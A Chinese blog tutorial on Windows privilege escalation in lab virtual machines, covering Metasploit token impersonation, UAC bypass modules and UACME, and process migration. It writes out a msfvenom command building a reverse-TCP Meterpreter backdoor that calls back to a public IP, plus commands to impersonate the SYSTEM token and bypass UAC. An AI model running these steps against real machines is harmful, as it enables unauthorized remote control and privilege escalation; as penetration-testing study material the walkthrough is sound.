WIN进程注入&BypassUAC&令牌窃取
2022/4/6 7:21:17
本文主要是介绍WIN进程注入&BypassUAC&令牌窃取,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
WIN进程注入&BypassUAC&令牌窃取
本地提权—win令牌窃取
假冒令牌可以假冒一个网络中的另一个用户进行各类操作。
所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。
我这里用到了windowns2008虚拟机做演示
先用msf生成一个后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe
msf上线
use incognito
导入模块
list_tokens -u
列出进程
impersonate_token "NT AUTHORITY\SYSTEM"
令牌窃取
获得system权限
BypassUAC绕过提权
什么是UAC?如何设置?
UAC(UserAccount Control,用户账户控制)
简言之就是在Vista及更高版本中通过弹框进一步让用户
确认是否授权当前可执行文件来达到阻止恶意程序的目的。
可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级)
参考:http://cn-sec.com/archives/116488.html
BypassUAC提权?常见绕过项目?
为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC
绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)
https://github.com/hfiref0x/UACME
在msf自带的提权getsystem中,如果遇到UAC,则不会成功。
win7演示:
使用msf自带模块绕过uac
use exploit/windows/local/bypassuac
getsystem
获得最高权限
另外我用了Win7 虚拟机进行 本地提权
我使用了这个模块:use exploit/windows/local/ask
但是该模块实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC,会触发系统UAC,受害机器有提示,提示用户是否要运行,如果用户选择“yes”,就可以程序返回一个高权限meterpreter shell,相当于钓鱼攻击。
当用户点击”是“后getsystem
。
获得最高权限。
进程注入
我用了win2008虚拟机做了演示
ps
命令查看进程
migrate PID
迁移对应PID
获得最高权限
这篇关于WIN进程注入&BypassUAC&令牌窃取的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-12深入理解 ECMAScript 2024 新特性:Map.groupBy() 分组操作
- 2025-01-11国产医疗级心电ECG采集处理模块
- 2025-01-10Rakuten 乐天积分系统从 Cassandra 到 TiDB 的选型与实战
- 2025-01-09CMS内容管理系统是什么?如何选择适合你的平台?
- 2025-01-08CCPM如何缩短项目周期并降低风险?
- 2025-01-08Omnivore 替代品 Readeck 安装与使用教程
- 2025-01-07Cursor 收费太贵?3分钟教你接入超低价 DeepSeek-V3,代码质量逼近 Claude 3.5
- 2025-01-06PingCAP 连续两年入选 Gartner 云数据库管理系统魔力象限“荣誉提及”
- 2025-01-05Easysearch 可搜索快照功能,看这篇就够了
- 2025-01-04BOT+EPC模式在基础设施项目中的应用与优势